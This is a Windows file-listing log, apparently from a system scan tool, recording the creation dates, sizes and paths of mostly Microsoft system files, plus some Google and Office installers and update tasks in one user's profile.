2016-05-19 23:17 - 2016-02-23 05:10 - 00027648 _____ (Microsoft Corporation) C:\Windows\system32\WiFiConfigSP.dll
2016-05-19 23:17 - 2016-02-23 05:07 - 00026112 _____ (Microsoft Corporation) C:\Windows\system32\wlansvcpal.dll
2016-05-19 23:17 - 2016-02-23 05:06 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\flvprophandler.dll
2016-05-19 23:17 - 2016-02-23 04:55 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bridge.sys
2016-05-19 23:17 - 2016-02-23 04:53 - 00099328 _____ (Microsoft Corporation) C:\Windows\system32\ngckeyenum.dll
2016-05-19 23:17 - 2016-02-23 04:40 - 00074240 _____ (Microsoft Corporation) C:\Windows\system32\SMSRouter.dll
2016-05-19 23:17 - 2016-02-23 04:39 - 00178176 _____ (Microsoft Corporation) C:\Windows\system32\psmsrv.dll
2016-05-19 23:17 - 2016-02-23 04:34 - 00189952 _____ (Microsoft Corporation) C:\Windows\system32\WiFiDisplay.dll
2016-05-19 23:17 - 2016-02-23 04:28 - 00275456 _____ (Microsoft Corporation) C:\Windows\system32\AudioEndpointBuilder.dll
2016-05-19 23:17 - 2016-02-23 04:23 - 00412672 _____ (Microsoft Corporation) C:\Windows\system32\wlanmsm.dll
2016-05-19 23:17 - 2016-02-23 04:02 - 00285696 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2016-05-19 23:17 - 2016-02-23 03:50 - 00266752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSFlacDecoder.dll
2016-05-19 23:17 - 2016-02-23 03:49 - 00200704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DisplayManager.dll
2016-05-19 23:17 - 2016-02-23 03:47 - 00157184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WiFiDisplay.dll
2016-05-19 23:17 - 2016-02-08 23:18 - 00297472 _____ (Microsoft Corporation) C:\Windows\system32\thumbcache.dll
2016-05-19 23:17 - 2016-02-08 23:18 - 00237056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\thumbcache.dll
2016-05-19 23:17 - 2016-01-27 01:59 - 00304752 _____ (Microsoft Corporation) C:\Windows\system32\systemreset.exe
2016-05-19 23:17 - 2016-01-27 01:55 - 00081112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\OpenWith.exe
2016-05-19 23:17 - 2016-01-27 01:44 - 00085320 _____ (Microsoft Corporation) C:\Windows\system32\OpenWith.exe
2016-05-19 23:17 - 2016-01-27 01:15 - 00031232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ztrace_maps.dll
2016-05-19 23:17 - 2016-01-27 01:08 - 00299008 _____ (Microsoft Corporation) C:\Windows\system32\microsoft-windows-system-events.dll
2016-05-19 23:17 - 2016-01-27 01:08 - 00036864 _____ (Microsoft Corporation) C:\Windows\system32\ztrace_maps.dll
2016-05-19 23:17 - 2016-01-27 01:07 - 00203264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iassam.dll
2016-05-19 23:17 - 2016-01-27 01:02 - 00109056 _____ (Microsoft Corporation) C:\Windows\system32\hlink.dll
2016-05-19 23:17 - 2016-01-27 00:59 - 00258048 _____ (Microsoft Corporation) C:\Windows\system32\iassam.dll
2016-05-19 23:17 - 2016-01-27 00:50 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2016-05-19 23:17 - 2016-01-27 00:44 - 00063488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cfgbkend.dll
2016-05-19 23:17 - 2016-01-27 00:31 - 00079360 _____ (Microsoft Corporation) C:\Windows\system32\cfgbkend.dll
2016-05-19 23:17 - 2016-01-16 02:37 - 00202472 _____ (Microsoft Corporation) C:\Windows\system32\wscapi.dll
2016-05-19 23:17 - 2016-01-16 02:20 - 00366224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll
2016-05-19 23:17 - 2016-01-16 01:41 - 00055296 _____ (Microsoft Corporation) C:\Windows\system32\MusNotificationUx.exe
2016-05-19 23:17 - 2016-01-16 01:40 - 00049152 _____ (Microsoft Corporation) C:\Windows\system32\pcaui.exe
2016-05-19 23:17 - 2016-01-16 01:40 - 00019456 _____ (Microsoft Corporation) C:\Windows\system32\rasautou.exe
2016-05-19 23:17 - 2016-01-16 01:39 - 00149504 _____ (Microsoft Corporation) C:\Windows\system32\FilterDS.dll
2016-05-19 23:17 - 2016-01-16 01:38 - 00193024 _____ (Microsoft Corporation) C:\Windows\system32\SimCfg.dll
2016-05-19 23:17 - 2016-01-16 01:36 - 00475648 _____ (Microsoft Corporation) C:\Windows\system32\DDDS.dll
2016-05-19 23:17 - 2016-01-16 01:36 - 00221696 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2016-05-19 23:17 - 2016-01-16 01:36 - 00160768 _____ (Microsoft Corporation) C:\Windows\system32\SimAuth.dll
2016-05-19 23:17 - 2016-01-16 01:35 - 00383488 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2016-05-19 23:17 - 2016-01-16 01:34 - 00477696 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2016-05-19 23:17 - 2016-01-16 01:33 - 00726528 _____ (Microsoft Corporation) C:\Windows\system32\wlidcli.dll
2016-05-19 23:17 - 2016-01-16 01:33 - 00574976 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Networking.UX.EapRequestHandler.dll
2016-05-19 23:17 - 2016-01-16 01:32 - 00041984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pcaui.exe
2016-05-19 23:17 - 2016-01-16 01:30 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SimCfg.dll
2016-05-19 23:17 - 2016-01-16 01:28 - 00884736 _____ (Microsoft Corporation) C:\Windows\system32\rasdlg.dll
2016-05-19 23:17 - 2016-01-16 01:28 - 00129024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SimAuth.dll
2016-05-19 23:17 - 2016-01-16 01:25 - 00510976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlidcli.dll
2016-05-19 23:17 - 2016-01-16 01:20 - 00799744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rasdlg.dll
2016-05-19 23:17 - 2016-01-16 01:19 - 00733184 _____ (Microsoft Corporation) C:\Windows\system32\rasapi32.dll
2016-05-19 23:17 - 2016-01-16 01:11 - 00653312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rasapi32.dll
2016-05-19 23:17 - 2016-01-04 22:48 - 00499432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2016-05-19 23:17 - 2016-01-04 22:37 - 00245840 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2016-05-19 23:17 - 2016-01-04 22:33 - 00116728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2016-05-19 23:17 - 2016-01-04 22:23 - 00119320 _____ (Microsoft Corporation) C:\Windows\system32\MP3DMOD.DLL
2016-05-19 23:17 - 2016-01-04 22:16 - 00100160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP3DMOD.DLL
2016-05-19 23:17 - 2016-01-04 21:57 - 00076288 _____ (Microsoft Corporation) C:\Windows\system32\RMSRoamingSecurity.dll
2016-05-19 23:17 - 2016-01-04 21:57 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\usermgrcli.dll
2016-05-19 23:17 - 2016-01-04 21:53 - 00148992 _____ (Microsoft Corporation) C:\Windows\system32\wshom.ocx
2016-05-19 23:17 - 2016-01-04 21:49 - 01255936 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOE.DLL
2016-05-19 23:17 - 2016-01-04 21:49 - 00167936 _____ (Microsoft Corporation) C:\Windows\system32\ProximityCommon.dll
2016-05-19 23:17 - 2016-01-04 21:48 - 00387072 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2016-05-19 23:17 - 2016-01-04 21:48 - 00034816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usermgrcli.dll
2016-05-19 23:17 - 2016-01-04 21:47 - 00305664 _____ (Microsoft Corporation) C:\Windows\system32\ksproxy.ax
2016-05-19 23:17 - 2016-01-04 21:44 - 00125440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wshom.ocx
2016-05-19 23:17 - 2016-01-04 21:41 - 01070080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOE.DLL
2016-05-19 23:17 - 2016-01-04 21:40 - 00890880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOD.DLL
2016-05-19 23:17 - 2016-01-04 21:40 - 00123392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ProximityCommon.dll
2016-05-19 23:17 - 2016-01-04 21:39 - 00235008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ksproxy.ax
2016-05-19 23:17 - 2015-12-07 00:06 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\KnobsCore.dll
2016-05-19 23:17 - 2015-12-07 00:04 - 00056320 _____ (Microsoft Corporation) C:\Windows\system32\provtool.exe
2016-05-19 23:17 - 2015-12-06 23:59 - 00165376 _____ (Microsoft Corporation) C:\Windows\system32\provdatastore.dll
2016-05-19 23:17 - 2015-12-06 23:43 - 00931328 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2ENC.DLL
2016-05-19 23:17 - 2015-12-06 23:38 - 00871936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPEG2ENC.DLL
2016-05-19 23:17 - 2015-12-06 23:32 - 00126464 _____ (Microsoft Corporation) C:\Windows\system32\dialserver.dll
2016-05-19 23:17 - 2015-11-24 05:37 - 00147968 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rmcast.sys
2016-05-19 23:17 - 2015-11-24 05:19 - 00182784 _____ (Microsoft Corporation) C:\Windows\system32\shutdownux.dll
2016-05-19 23:17 - 2015-11-24 05:12 - 00523776 _____ (Microsoft Corporation) C:\Windows\system32\catsrvut.dll
2016-05-19 23:17 - 2015-11-24 04:14 - 00415744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\catsrvut.dll
2016-05-19 23:17 - 2015-11-22 06:34 - 00080600 _____ (Microsoft Corporation) C:\Windows\system32\wwapi.dll
2016-05-19 23:17 - 2015-11-22 06:33 - 00095072 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\sdstor.sys
2016-05-19 23:17 - 2015-11-22 06:33 - 00051680 _____ (Microsoft Corporation) C:\Windows\system32\SensorsUtilsV2.dll
2016-05-19 23:17 - 2015-11-22 06:25 - 00063528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wwapi.dll
2016-05-19 23:17 - 2015-11-22 05:55 - 00070656 _____ (Microsoft Corporation) C:\Windows\system32\XblAuthManagerProxy.dll
2016-05-19 23:17 - 2015-11-22 05:54 - 00117248 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\capimg.sys
2016-05-19 23:17 - 2015-11-22 05:50 - 00074240 _____ (Microsoft Corporation) C:\Windows\system32\mssign32.dll
2016-05-19 23:17 - 2015-11-22 05:43 - 00704000 _____ (Microsoft Corporation) C:\Windows\system32\CellularAPI.dll
2016-05-19 23:17 - 2015-11-22 05:43 - 00041984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XblAuthManagerProxy.dll
2016-05-19 23:17 - 2015-11-22 05:38 - 00060928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssign32.dll
2016-05-19 23:16 - 2016-04-23 00:33 - 00089600 _____ (Microsoft Corporation) C:\Windows\system32\NFCProvisioningPlugin.dll
2016-05-19 23:16 - 2016-04-23 00:33 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\wshbth.dll
2016-05-19 23:16 - 2016-04-23 00:33 - 00038400 _____ (Microsoft Corporation) C:\Windows\system32\ByteCodeGenerator.exe
2016-05-19 23:16 - 2016-04-23 00:32 - 00134656 _____ (Microsoft Corporation) C:\Windows\system32\wificonnapi.dll
2016-05-19 23:16 - 2016-04-23 00:29 - 00031232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ByteCodeGenerator.exe
2016-05-19 23:16 - 2016-04-23 00:29 - 00023552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll
2016-05-19 23:16 - 2016-04-23 00:28 - 00051712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wshbth.dll
2016-05-19 23:16 - 2016-04-23 00:27 - 00039424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wfdprov.dll
2016-05-19 23:16 - 2016-04-23 00:19 - 00395264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlansec.dll
2016-05-19 23:16 - 2016-04-23 00:17 - 00337920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlanmsm.dll
2016-05-19 23:16 - 2016-04-22 22:10 - 00002186 _____ C:\Windows\system32\AppxProvisioning.xml
2016-05-19 23:16 - 2016-04-18 18:30 - 00002186 _____ C:\Windows\SysWOW64\AppxProvisioning.xml
2016-05-19 23:16 - 2016-03-29 04:16 - 00026112 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\xinputhid.sys
2016-05-19 23:16 - 2016-03-29 04:07 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\SensorsNativeApi.V2.dll
2016-05-19 23:16 - 2016-03-29 04:07 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\dmenterprisediagnostics.dll
2016-05-19 23:16 - 2016-03-29 04:06 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\oleacchooks.dll
2016-05-19 23:16 - 2016-03-29 04:00 - 00076800 _____ (Microsoft Corporation) C:\Windows\system32\NetCfgNotifyObjectHost.exe
2016-05-19 23:16 - 2016-03-29 03:58 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\wininetlui.dll
2016-05-19 23:16 - 2016-03-29 03:57 - 00095744 _____ (Microsoft Corporation) C:\Windows\system32\samlib.dll
2016-05-19 23:16 - 2016-03-29 03:55 - 00036352 _____ (Microsoft Corporation) C:\Windows\system32\tbauth.dll
2016-05-19 23:16 - 2016-03-29 03:53 - 00116224 _____ (Microsoft Corporation) C:\Windows\system32\FontProvider.dll
2016-05-19 23:16 - 2016-03-29 03:52 - 00026112 _____ (Microsoft Corporation) C:\Windows\system32\TokenBrokerCookies.exe
2016-05-19 23:16 - 2016-03-29 03:50 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\BdeHdCfgLib.dll
2016-05-19 23:16 - 2016-03-29 03:34 - 00333824 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\portcls.sys
2016-05-19 23:16 - 2016-03-29 03:20 - 00080384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SensorsNativeApi.V2.dll
2016-05-19 23:16 - 2016-03-29 03:19 - 00010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleacchooks.dll
2016-05-19 23:16 - 2016-03-29 03:12 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininetlui.dll
2016-05-19 23:16 - 2016-03-29 03:12 - 00045568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2016-05-19 23:16 - 2016-03-29 03:11 - 00061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\samlib.dll
2016-05-19 23:16 - 2016-03-29 03:09 - 00030208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tbauth.dll
2016-05-19 23:16 - 2016-03-29 03:06 - 00022528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TokenBrokerCookies.exe
2016-05-19 23:16 - 2016-03-29 03:05 - 00052736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\OnDemandConnRouteHelper.dll
2016-05-19 23:16 - 2016-03-29 03:00 - 00176128 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettings.DeviceEncryptionHandlers.dll
2016-05-19 23:16 - 2016-03-29 02:59 - 00108544 _____ (Microsoft Corporation) C:\Windows\system32\InputLocaleManager.dll
2016-05-19 23:16 - 2016-03-29 02:52 - 00141824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\easwrt.dll
2016-05-19 23:16 - 2016-03-29 02:27 - 00083456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InputLocaleManager.dll
2016-05-19 23:16 - 2016-02-24 03:39 - 00045568 _____ (Microsoft Corporation) C:\Windows\system32\UserDataTypeHelperUtil.dll
2016-05-19 23:16 - 2016-02-24 03:39 - 00023552 _____ (Microsoft Corporation) C:\Windows\system32\ExtrasXmlParser.dll
2016-05-19 23:16 - 2016-02-24 03:38 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\UserDataTimeUtil.dll
2016-05-19 23:16 - 2016-02-24 03:37 - 00045056 _____ (Microsoft Corporation) C:\Windows\system32\UserDataLanguageUtil.dll
2016-05-19 23:16 - 2016-02-24 03:22 - 00196608 _____ (Microsoft Corporation) C:\Windows\system32\fwpolicyiomgr.dll
2016-05-19 23:16 - 2016-02-24 03:01 - 00067584 _____ (Microsoft Corporation) C:\Windows\system32\profext.dll
2016-05-19 23:16 - 2016-02-24 02:54 - 00037888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDataTypeHelperUtil.dll
2016-05-19 23:16 - 2016-02-24 02:53 - 00037888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDataLanguageUtil.dll
2016-05-19 23:16 - 2016-02-24 02:52 - 00048128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PimIndexMaintenanceClient.dll
2016-05-19 23:16 - 2016-02-24 02:46 - 00020480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wfapigp.dll
2016-05-19 23:16 - 2016-02-24 02:40 - 00056320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDataPlatformHelperUtil.dll
2016-05-19 23:16 - 2016-02-24 02:39 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fwpolicyiomgr.dll
2016-05-19 23:16 - 2016-02-24 02:23 - 00129024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CallHistoryClient.dll
2016-05-19 23:16 - 2016-02-24 02:22 - 00053248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\profext.dll
2016-05-19 23:16 - 2016-02-23 05:07 - 00037376 _____ (Microsoft Corporation) C:\Windows\system32\LaunchWinApp.exe
2016-05-19 23:16 - 2016-02-23 05:01 - 00104960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rasl2tp.sys
2016-05-19 23:16 - 2016-02-23 05:00 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\wfdprov.dll
2016-05-19 23:16 - 2016-02-23 04:58 - 00025088 _____ (Microsoft Corporation) C:\Windows\system32\irmon.dll
2016-05-19 23:16 - 2016-02-23 04:53 - 00115712 _____ (Microsoft Corporation) C:\Windows\system32\srpapi.dll
2016-05-19 23:16 - 2016-02-23 04:48 - 00041984 _____ (Microsoft Corporation) C:\Windows\system32\TimeBrokerClient.dll
2016-05-19 23:16 - 2016-02-23 04:14 - 00029696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\LaunchWinApp.exe
2016-05-19 23:16 - 2016-02-23 03:57 - 00031744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TimeBrokerClient.dll
2016-05-19 23:16 - 2016-01-27 01:10 - 00099840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\hlink.dll
2016-05-19 23:16 - 2016-01-27 00:32 - 01087488 _____ (Microsoft Corporation) C:\Windows\system32\reseteng.dll
2016-05-19 23:16 - 2016-01-16 01:44 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\rasadhlp.dll
2016-05-19 23:16 - 2016-01-16 01:44 - 00013824 _____ (Microsoft Corporation) C:\Windows\system32\rastlsext.dll
2016-05-19 23:16 - 2016-01-16 01:43 - 00097280 _____ (Microsoft Corporation) C:\Windows\system32\winhttpcom.dll
2016-05-19 23:16 - 2016-01-16 01:42 - 00013824 _____ (Microsoft Corporation) C:\Windows\system32\sscoreext.dll
2016-05-19 23:16 - 2016-01-16 01:40 - 00106496 _____ (Microsoft Corporation) C:\Windows\system32\rasauto.dll
2016-05-19 23:16 - 2016-01-16 01:38 - 00130560 _____ (Microsoft Corporation) C:\Windows\system32\winbio.dll
2016-05-19 23:16 - 2016-01-16 01:36 - 00011776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastlsext.dll
2016-05-19 23:16 - 2016-01-16 01:35 - 00013312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rasadhlp.dll
2016-05-19 23:16 - 2016-01-16 01:34 - 00079360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winhttpcom.dll
2016-05-19 23:16 - 2016-01-16 01:31 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rasautou.exe
2016-05-19 23:16 - 2016-01-16 01:30 - 00093696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winbio.dll
2016-05-19 23:16 - 2016-01-04 21:51 - 00472576 _____ (Microsoft Corporation) C:\Windows\system32\DscCore.dll
2016-05-19 23:16 - 2016-01-04 21:51 - 00248832 _____ (Microsoft Corporation) C:\Windows\system32\UserMgrProxy.dll
2016-05-19 23:16 - 2016-01-04 21:49 - 01582080 _____ (Microsoft Corporation) C:\Windows\system32\aitstatic.exe
2016-05-19 23:16 - 2016-01-04 21:42 - 00166912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserMgrProxy.dll
2016-05-19 23:16 - 2015-12-07 00:15 - 00075776 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Networking.XboxLive.ProxyStub.dll
2016-05-19 23:16 - 2015-12-07 00:09 - 00030208 _____ (Microsoft Corporation) C:\Windows\system32\StorageUsage.dll
2016-05-19 23:16 - 2015-12-07 00:07 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\ProvPluginEng.dll
2016-05-19 23:16 - 2015-12-07 00:05 - 00036864 _____ (Microsoft Corporation) C:\Windows\system32\BackgroundTransferHost.exe
2016-05-19 23:16 - 2015-12-07 00:01 - 00034304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\BackgroundTransferHost.exe
2016-05-19 23:16 - 2015-11-24 06:01 - 02756096 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2016-05-19 23:16 - 2015-11-24 05:54 - 00007680 _____ (Microsoft Corporation) C:\Windows\system32\readingviewresources.dll
2016-05-19 23:16 - 2015-11-24 05:53 - 00115200 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-05-19 23:16 - 2015-11-24 05:45 - 00018944 _____ (Microsoft Corporation) C:\Windows\system32\wshrm.dll
2016-05-19 23:16 - 2015-11-24 04:54 - 02756096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2016-05-19 23:16 - 2015-11-22 06:00 - 00058368 _____ (Microsoft Corporation) C:\Windows\system32\MosResource.dll
2016-05-19 23:16 - 2015-11-22 05:57 - 00110592 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft-Windows-MapControls.dll
2016-05-19 23:16 - 2015-11-22 05:57 - 00036352 _____ (Microsoft Corporation) C:\Windows\system32\UIAutomationCoreRes.dll
2016-05-19 23:16 - 2015-11-22 05:57 - 00010240 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft-Windows-MosTrace.dll
2016-05-19 23:16 - 2015-11-22 05:57 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft-Windows-MosHost.dll
2016-05-19 23:16 - 2015-11-22 05:56 - 01268736 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.Resources.dll
2016-05-19 23:16 - 2015-11-22 05:56 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\ihvrilproxy.dll
2016-05-19 23:16 - 2015-11-22 05:56 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rilproxy.dll
2016-05-19 23:16 - 2015-11-22 05:55 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\MapsBtSvcProxy.dll
2016-05-19 23:16 - 2015-11-22 05:54 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\wwanprotdim.dll
2016-05-19 23:16 - 2015-11-22 05:54 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\wsplib.dll
2016-05-19 23:16 - 2015-11-22 05:54 - 00032256 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2016-05-19 23:16 - 2015-11-22 05:54 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\WordBreakers.dll
2016-05-19 23:16 - 2015-11-22 05:54 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\nativemap.dll
2016-05-19 23:16 - 2015-11-22 05:54 - 00003072 _____ (Microsoft Corporation) C:\Windows\system32\MapControlStringsRes.dll
2016-05-19 23:16 - 2015-11-22 05:52 - 00060928 _____ (Microsoft Corporation) C:\Windows\system32\XblAuthTokenBrokerExt.dll
2016-05-19 23:16 - 2015-11-22 05:51 - 00042496 _____ (Microsoft Corporation) C:\Windows\system32\mapstoasttask.dll
2016-05-19 23:16 - 2015-11-22 05:51 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2016-05-19 23:16 - 2015-11-22 05:49 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2016-05-19 23:16 - 2015-11-22 05:49 - 00052224 _____ (Microsoft Corporation) C:\Windows\system32\Wwanpref.dll
2016-05-19 23:16 - 2015-11-22 05:48 - 00058368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MosResource.dll
2016-05-19 23:16 - 2015-11-22 05:45 - 06572032 _____ (Microsoft Corporation) C:\Windows\system32\wwanmm.dll
2016-05-19 23:16 - 2015-11-22 05:45 - 00264192 _____ (Nokia) C:\Windows\system32\NmaDirect.dll
2016-05-19 23:16 - 2015-11-22 05:45 - 00110592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Microsoft-Windows-MapControls.dll
2016-05-19 23:16 - 2015-11-22 05:45 - 00073728 _____ (Microsoft Corporation) C:\Windows\system32\wwancfg.dll
2016-05-19 23:16 - 2015-11-22 05:45 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UIAutomationCoreRes.dll
2016-05-19 23:16 - 2015-11-22 05:45 - 00010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Microsoft-Windows-MosTrace.dll
2016-05-19 23:16 - 2015-11-22 05:45 - 00009728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Microsoft-Windows-MosHost.dll
2016-05-19 23:16 - 2015-11-22 05:44 - 01268736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Xaml.Resources.dll
2016-05-19 23:16 - 2015-11-22 05:42 - 00024064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WordBreakers.dll
2016-05-19 23:16 - 2015-11-22 05:42 - 00003072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MapControlStringsRes.dll
2016-05-19 23:16 - 2015-11-22 05:41 - 01814528 _____ (Microsoft Corporation) C:\Windows\system32\pnidui.dll
2016-05-19 23:16 - 2015-11-22 05:40 - 00465920 _____ (Microsoft Corporation) C:\Windows\system32\wwanconn.dll
2016-05-19 23:16 - 2015-11-22 05:40 - 00049152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XblAuthTokenBrokerExt.dll
2016-05-19 23:16 - 2015-11-22 05:39 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\offlinelsa.dll
2016-05-19 23:16 - 2015-11-22 05:34 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\EditBufferTestHook.dll
2016-05-19 23:16 - 2015-11-22 05:33 - 00205824 _____ (Nokia) C:\Windows\SysWOW64\NmaDirect.dll
2016-05-19 23:16 - 2015-11-22 05:28 - 00100864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\offlinelsa.dll
2016-05-19 23:16 - 2015-11-22 05:24 - 00059904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\EditBufferTestHook.dll
2016-05-19 22:59 - 2016-05-19 22:59 - 00987728 _____ (Google Inc.) C:\Users\Jennifer JonesSantos\Downloads\googledrivesync (1).exe
2016-05-19 22:45 - 2016-05-19 22:45 - 00987728 _____ (Google Inc.) C:\Users\Jennifer JonesSantos\Downloads\googledrivesync.exe
2016-05-19 22:20 - 2016-06-16 15:31 - 00001000 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-4252830516-2523568588-2152128588-1002UA.job
2016-05-19 22:20 - 2016-06-14 22:31 - 00000948 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-4252830516-2523568588-2152128588-1002Core.job
2016-05-19 22:20 - 2016-05-19 22:26 - 00004148 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4252830516-2523568588-2152128588-1002UA
2016-05-19 22:20 - 2016-05-19 22:26 - 00003772 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4252830516-2523568588-2152128588-1002Core
2016-05-19 22:20 - 2016-05-19 22:20 - 02662800 _____ (Google) C:\Users\Jennifer JonesSantos\Downloads\gpautobackup_setup.exe
2016-05-19 22:14 - 2016-06-02 16:25 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Local\Google
2016-05-19 22:14 - 2016-05-29 14:48 - 00000000 ____D C:\Program Files (x86)\Google
2016-05-19 21:39 - 2016-05-19 21:39 - 03191488 _____ (Microsoft Corporation) C:\Users\Jennifer JonesSantos\Downloads\Setup.X86.en-US_O365BusinessRetail_ef4b3d9d-1f36-477b-b265-221a2d3eabba_TX_PR_b_32_.exe
2016-05-19 21:39 - 2016-05-19 21:39 - 00002248 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneDrive for Business.lnk
